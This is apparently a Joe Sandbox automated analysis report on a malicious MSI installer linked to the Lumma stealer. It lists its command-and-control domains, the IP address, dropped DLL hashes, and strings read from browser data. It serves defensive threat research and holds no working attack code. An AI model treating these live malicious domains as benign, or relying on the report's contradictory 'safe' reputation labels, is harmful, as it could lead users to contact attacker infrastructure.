              https://fixxyplanterv.click/%a0%Avira URL Cloudsafe
              https://fixxyplanterv.click/apib0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              fixxyplanterv.click
              172.67.134.197
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                dare-curbys.bizfalse
                  high
                  impend-differ.bizfalse
                    high
                    covery-mover.bizfalse
                      high
                      https://fixxyplanterv.click/apitrue
                      • Avira URL Cloud: safe
                      unknown
                      dwell-exclaim.bizfalse
                        high
                        zinc-sneark.bizfalse
                          high
                          fixxyplanterv.clicktrue
                          • Avira URL Cloud: safe
                          unknown
                          formy-spill.bizfalse
                            high
                            se-blurry.bizfalse
                              high
                              print-vexer.bizfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabdxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icodxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://fixxyplanterv.click/ddxdiag.exe, 00000006.00000003.2217619969.0000000002985000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYidxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://fixxyplanterv.click/dxdiag.exe, 00000006.00000003.2295091378.0000000002995000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.rootca1.amazontrust.com/rootca1.crl0dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ocsp.rootca1.amazontrust.com0:dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://fixxyplanterv.click/alS5dxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.ecosia.org/newtab/dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgdxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brdxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://fixxyplanterv.click/pidxdiag.exe, 00000006.00000002.2308418613.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2304057412.0000000002995000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://ac.ecosia.org/autocomplete?q=dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://fixxyplanterv.click/apiuudxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://fixxyplanterv.click/cedxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgdxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://fixxyplanterv.click/ob:6_dxdiag.exe, 00000006.00000003.2274208940.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2258750277.0000000002988000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000002.2308418613.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2304057412.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2280230391.0000000002988000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2279871689.000000000298F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2295091378.0000000002995000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://x1.c.lencr.org/0dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.i.lencr.org/0dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://fixxyplanterv.click/apiQdxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://fixxyplanterv.click/apibdxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://support.mozilla.org/products/firefoxgro.alldxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://fixxyplanterv.click/%adxdiag.exe, 00000006.00000003.2258774051.0000000002982000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.mozilla.ordxdiag.exe, 00000006.00000003.2242227992.0000000004A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctadxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                172.67.134.197
                                                                                fixxyplanterv.clickUnited States
                                                                                13335CLOUDFLARENETUStrue
                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                Analysis ID:1589838
                                                                                Start date and time:2025-01-13 08:28:11 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 6m 29s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:9
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:msit.msi
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winMSI@10/25@1/1
                                                                                EGA Information:
                                                                                • Successful, ratio: 50%
                                                                                HCA Information:Failed
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .msi
                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                • Excluded IPs from analysis (whitelisted): 13.107.253.45, 4.245.163.56
                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target MSIAEB.tmp, PID 2248 because there are no executed function
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                TimeTypeDescription
                                                                                02:29:11API Interceptor8x Sleep call for process: dxdiag.exe modified
                                                                                No context
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                fixxyplanterv.clickschost.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.6.116
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSShipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.26.13.205
                                                                                trow.exeGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.comGet hashmaliciousUnknownBrowse
                                                                                • 104.17.25.14
                                                                                https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5DkGet hashmaliciousUnknownBrowse
                                                                                • 172.67.40.50
                                                                                g3.elfGet hashmaliciousUnknownBrowse
                                                                                • 1.1.1.1
                                                                                g5.elfGet hashmaliciousUnknownBrowse
                                                                                • 1.1.1.1
                                                                                rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.26.12.205
                                                                                https://app-nadexlxogi.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                • 172.64.151.8
                                                                                https://postaboutx.com/Get hashmaliciousUnknownBrowse
                                                                                • 172.67.134.64
                                                                                https://informed.deliveryerz.top/us/Get hashmaliciousUnknownBrowse
                                                                                • 104.16.40.28
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                a0e9f5d64349fb13191bc781f81f42e1PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                                                • 172.67.134.197
                                                                                PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                                                • 172.67.134.197
                                                                                L7GNkeVm5e.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.134.197
                                                                                sE5IdDeTp2.exeGet hashmaliciousUnknownBrowse
                                                                                • 172.67.134.197
                                                                                NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.134.197
                                                                                g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.134.197
                                                                                lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.134.197
                                                                                UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                • 172.67.134.197
                                                                                sE5IdDeTp2.exeGet hashmaliciousUnknownBrowse
                                                                                • 172.67.134.197
                                                                                TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.134.197
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\Windows\Installer\MSI602.tmpFact30.NATURGY.LUNESGRLNOPAGOID3012021414252024.MSI.msiGet hashmaliciousUnknownBrowse
                                                                                  Fact28.NATURGY.SABADONOPAGOID28122024.MSI.msiGet hashmaliciousUnknownBrowse
                                                                                    bmouJCkvam.msiGet hashmaliciousUnknownBrowse
                                                                                      FS-SZHAJCVS.msiGet hashmaliciousUnknownBrowse
                                                                                        FS-JFDIBGWE.msiGet hashmaliciousUnknownBrowse
                                                                                          http://propdfhub.comGet hashmaliciousUnknownBrowse
                                                                                            http://res.pdfonestartlive.comGet hashmaliciousUnknownBrowse
                                                                                              740d3a.msiGet hashmaliciousUnknownBrowse
                                                                                                740d3a.msiGet hashmaliciousPureCrypterBrowse
                                                                                                  j45EY4ovxx.msiGet hashmaliciousMatanbuchusBrowse
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):863
                                                                                                    Entropy (8bit):5.5270055721306175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:r/BMV8TvbPQjp6eSGV8Tv6V8Tv2pUn4oOYDhiSs6ao7id:7i6oke5h447YD8Ss6asW
                                                                                                    MD5:B6A596CC7D1F941FC4416D7E9540519C
                                                                                                    SHA1:BA2BE5D5E48DA96F793F2E3D3312163CAC109374
                                                                                                    SHA-256:CDC892359E93C912ABC6196914DC8ED964763433DEBD72542C9E35DA0A59965E
                                                                                                    SHA-512:C5D7EAFE353F5D5B3D45928A2D67F95A3A2B884232C73DF6C69C6CAAB22C791D2E8B9DF3E78B3E8891C1F9729AD287EBC9E108889771FD33A4C5B7E73EE45A6A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:...@IXOS.@.....@..-Z.@.....@.....@.....@.....@.....@......&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}..msit..msit.msi.@.....@.....@.....@........&.{BA748999-88DC-472F-9632-A6EFC559C1F2}.....@.....@.....@.....@.......@.....@.....@.......@......msit......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{86FA086C-1DD0-4082-AC92-FB7682CD7E34}&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}.@......&.{78C5261A-F04A-4AA9-A391-7F6716DBC52E}&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}.@........CreateFolders..Creating folders..Folder: [1]#.!.C:\Program Files (x86)\msit\msit\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@......Software\msit\msit...@....(.&...Version..1.0.0'.&...Path!.C:\Program Files (x86)\msit\msit\...@.....@.....@....
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {BA748999-88DC-472F-9632-A6EFC559C1F2}, Number of Words: 2, Subject: msit, Author: msit, Name of Creating Application: msit, Template: ;1033, Comments: This installer database contains the logic and data required to install msit., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Dec 13 03:26:19 2024, Last Saved Time/Date: Fri Dec 13 03:26:19 2024, Last Printed: Fri Dec 13 03:26:19 2024, Number of Pages: 450
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16847872
                                                                                                    Entropy (8bit):7.611938145565435
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:393216:LPF3zv8Zrqb+CUuubX26jytnTPjnXcBv9k2VvOTp:JzwqNUHytvnMd9Z
                                                                                                    MD5:18577F68754F3E2703CDCA2DF9BA65FF
                                                                                                    SHA1:8D8846470510B1B6F81C0725975C7C3589568BB3
                                                                                                    SHA-256:413C17F73A0831D6AE209E491856A66E07E8C0AF70E7E06F68A7B7570CCB3A95
                                                                                                    SHA-512:EB238A258B0DFE40716C2A8BC847951ABBAC4E7224ECEFCB13BE559A63CC39E6645E406764991CB60B87AA082196B890FF78C3C25C659B851EB02C4064E8EAEC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......................>...........................................1...........H.......p.......i............................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...............<...........!...4............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...5...2...3...=...?...6...7...8...9...:...;...F.......>...G...@...A...B...C...D...E...................J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1021792
                                                                                                    Entropy (8bit):6.608380087035959
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                    MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                    SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                    SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                    SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: Fact30.NATURGY.LUNESGRLNOPAGOID3012021414252024.MSI.msi, Detection: malicious, Browse
                                                                                                    • Filename: Fact28.NATURGY.SABADONOPAGOID28122024.MSI.msi, Detection: malicious, Browse
                                                                                                    • Filename: bmouJCkvam.msi, Detection: malicious, Browse
                                                                                                    • Filename: FS-SZHAJCVS.msi, Detection: malicious, Browse
                                                                                                    • Filename: FS-JFDIBGWE.msi, Detection: malicious, Browse
                                                                                                    • Filename: , Detection: malicious, Browse
                                                                                                    • Filename: , Detection: malicious, Browse
                                                                                                    • Filename: 740d3a.msi, Detection: malicious, Browse
                                                                                                    • Filename: 740d3a.msi, Detection: malicious, Browse
                                                                                                    • Filename: j45EY4ovxx.msi, Detection: malicious, Browse
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1021792
                                                                                                    Entropy (8bit):6.608380087035959
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                    MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                    SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                    SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                    SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1021792
                                                                                                    Entropy (8bit):6.608380087035959
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                    MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                    SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                    SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                    SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1021792
                                                                                                    Entropy (8bit):6.608380087035959
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                    MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                    SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                    SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                    SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1201504
                                                                                                    Entropy (8bit):6.4558508565404535
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:h4FsQxRqkY1ngOktwC2Tec+4VGWSlnH/YrjPWqTIUGFUrHtAkJMsFUh29BKjxm:a2QxNwCsec+4VGWSlnfYvOjUGFUrHtA2
                                                                                                    MD5:03CC8828BB0E0105915B7695B1EC8D88
                                                                                                    SHA1:CBF8EC531EA7E3EE58B51BD642F8BFABDC759EE1
                                                                                                    SHA-256:0E1491AE7344F3A5EC824732648CCDDA19B271D6F01471793BF292840FC83B5E
                                                                                                    SHA-512:593A76166EB6CE2E3537B0D93E216DAEF12E4AB5B181A194B55A90B39A1AF2E0374C4EC3833A000530425319A003CD1A648489640FCCAF108061EBEA1D9CB1E7
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............@G..@G..@G.yCF..@G.yEF..@G.|CF..@G.|DF..@G.|EF..@G.yDF..@G.yAF..@G..AG..@G.}IF..@G.}@F..@G.}.G..@G...G..@G.}BF..@GRich..@G........PE..L...v..f.........."!...).~..........Pq.......................................`............@A........................ ...t...............................`=.......l......p........................... ...@...............L............................text...J}.......~.................. ..`.rdata...;.......<..................@..@.data...............................@....fptable............................@....rsrc...............................@..@.reloc...l.......n..................@..B........................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1021792
                                                                                                    Entropy (8bit):6.608380087035959
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                    MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                    SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                    SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                    SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
